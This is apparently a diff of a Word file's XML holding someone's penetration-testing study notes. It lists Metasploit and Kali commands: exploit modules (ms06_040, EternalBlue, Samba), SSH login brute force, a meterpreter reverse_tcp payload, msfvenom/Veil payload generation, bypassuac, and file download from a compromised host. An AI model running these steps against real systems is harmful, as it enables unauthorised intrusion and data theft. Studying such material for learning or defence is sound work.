                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /usr/share/Metasploit-framework</w:t>
+              <w:t>Cd /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>usr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2583,6 +3283,7 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2590,14 +3291,23 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">to trigger </w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> in shell</w:t>
+              <w:t xml:space="preserve">to </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t xml:space="preserve">trigger </w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> in</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> shell</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">  </w:t>
@@ -2665,7 +3375,15 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/smb/ms06_040.netapi</w:t>
+              <w:t>windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2747,12 +3465,14 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -2843,18 +3563,58 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchsploit {version}</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nmap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>sV</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
@@ -2862,10 +3622,18 @@
               <w:t>ear</w:t>
             </w:r>
             <w:r>
-              <w:t>ch {</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> version </w:t>
+              <w:t xml:space="preserve">ch </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>{</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> version</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:t>}</w:t>
@@ -2873,12 +3641,28 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use exploit/unix/-&gt;</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: show payploads or show options</w:t>
+              <w:t>CL: use exploit/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>unix</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: show </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>payploads</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> or show options</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2902,17 +3686,33 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Netcat – allow connection to UDP and TCP</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:r>
-              <w:t>CL: nc -help</w:t>
+              <w:t>Netcat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>nc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -help</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2944,8 +3744,33 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: Searchsploit Linux tetnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>tetnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2959,8 +3784,17 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: search Linux telnetd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search Linux </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>telnetd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2974,7 +3808,23 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>CL: telnet {ipaddress}</w:t>
+              <w:t>CL: telnet {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>ipaddress</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3002,17 +3852,41 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: searchs samba</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchs</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> samba</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3022,12 +3896,33 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/smb_version</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: use auxiliary/scanner/smb/{VERSION}</w:t>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb_version</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>smb</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/{VERSION}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3093,7 +3988,15 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: searchsploit Samba 3.0.20</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>searchsploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> Samba 3.0.20</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3173,8 +4076,21 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use auxiliary/scanner/ssh/ssh_login</w:t>
-            </w:r>
+              <w:t>CL: use auxiliary/scanner/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh_login</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3190,7 +4106,15 @@
               <w:t>PASS_FILE</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> {filepath}</w:t>
+              <w:t xml:space="preserve"> {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>filepath</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3266,7 +4190,23 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: ssh msfadmin@{IPADDRESS}</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ssh</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfadmin</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>@{IPADDRESS}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3291,8 +4231,21 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: set payload windows/meterpreter/reverse_tcp</w:t>
-            </w:r>
+              <w:t>CL: set payload windows/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>reverse_tcp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3365,8 +4318,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: search eternalblue</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>eternalblue</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p/>
         </w:tc>
@@ -3387,12 +4345,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>DoublePulsar</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
@@ -3413,13 +4373,36 @@
             </w:r>
           </w:p>
           <w:p>
-            <w:r>
-              <w:t>Sudo su</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>Sudo dpkg –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>su</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Sudo</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dpkg</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –add-architecture i386 &amp;&amp; apt-get update &amp;&amp; apt-get install wine32</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3444,11 +4427,19 @@
                 <w:highlight w:val="yellow"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>BlueKeep -RDP Vulnerability</w:t>
+              <w:t>BlueKeep</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> -RDP Vulnerability</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3477,12 +4468,14 @@
             <w:pPr>
               <w:jc w:val="center"/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
               <w:t>Routersploit</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -3513,8 +4506,13 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Follow the instructions in github</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Follow the instructions in </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>github</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3641,8 +4639,21 @@
                 <w:szCs w:val="20"/>
                 <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
               </w:rPr>
-              <w:t>cd routersploit</w:t>
-            </w:r>
+              <w:t xml:space="preserve">cd </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+              </w:rPr>
+              <w:t>routersploit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -3743,8 +4754,13 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: use scanners/autopwn</w:t>
-            </w:r>
+              <w:t>CL: use scanners/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>autopwn</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3842,7 +4858,21 @@
               <w:rPr>
                 <w:highlight w:val="green"/>
               </w:rPr>
-              <w:t>Gaining Access(Viruses, Trojan, Payloads)</w:t>
+              <w:t xml:space="preserve">Gaining </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Access(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Viruses, Trojan, Payloads)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3865,8 +4895,18 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Note: msfvenom</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -3900,7 +4940,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL: msfvenom -h</w:t>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -h</w:t>
             </w:r>
             <w:r>
               <w:t>elp or -h</w:t>
@@ -3908,8 +4956,15 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:r>
-              <w:t>CL:msfvenom -p</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>CL:msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> -p</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -3921,12 +4976,28 @@
               <w:t>:</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> msfvenom –list venom</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">CL: msfvenom –list </w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list venom</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>msfvenom</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> –list </w:t>
             </w:r>
             <w:r>
               <w:t>payload</w:t>
@@ -3973,7 +5044,25 @@
                 <w:bCs/>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t>Veil – generating powershell payload</w:t>
+              <w:t xml:space="preserve">Veil – generating </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>powershell</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> payload</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4064,7 +5153,15 @@
               <w:jc w:val="center"/>
             </w:pPr>
             <w:r>
-              <w:t>Note: fatrat – check it out in google and follow instructions</w:t>
+              <w:t xml:space="preserve">Note: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fatrat</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – check it out in google and follow instructions</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4104,9 +5201,11 @@
             <w:gridSpan w:val="2"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>getuid</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -4175,21 +5274,36 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>CL meterpreter</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>meterpreter</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> &gt; </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:r>
-              <w:t>CL: pwd</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>CL: dir</w:t>
-            </w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>pwd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t xml:space="preserve">CL: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dir</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -4225,12 +5339,28 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>Some of the command in, when your in windows 10 machine</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t>&gt;download {fileName}</w:t>
+              <w:t xml:space="preserve">Some of the command in, when </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:t>your</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> in windows 10 machine</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>&gt;download {</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4241,7 +5371,15 @@
               <w:t xml:space="preserve">upload </w:t>
             </w:r>
             <w:r>
-              <w:t>{fileName}</w:t>
+              <w:t>{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>fileName</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4284,7 +5422,15 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>&gt;search bypassuac – user account control</w:t>
+              <w:t xml:space="preserve">&gt;search </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>bypassuac</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> – user account control</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4309,6 +5455,2545 @@
               <w:t>&gt;</w:t>
             </w:r>
           </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="9350" w:type="dxa"/>
+            <w:gridSpan w:val="2"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="green"/>
+              </w:rPr>
+              <w:t>Second Coding Challenge</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4675" w:type="dxa"/>
+          </w:tcPr>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
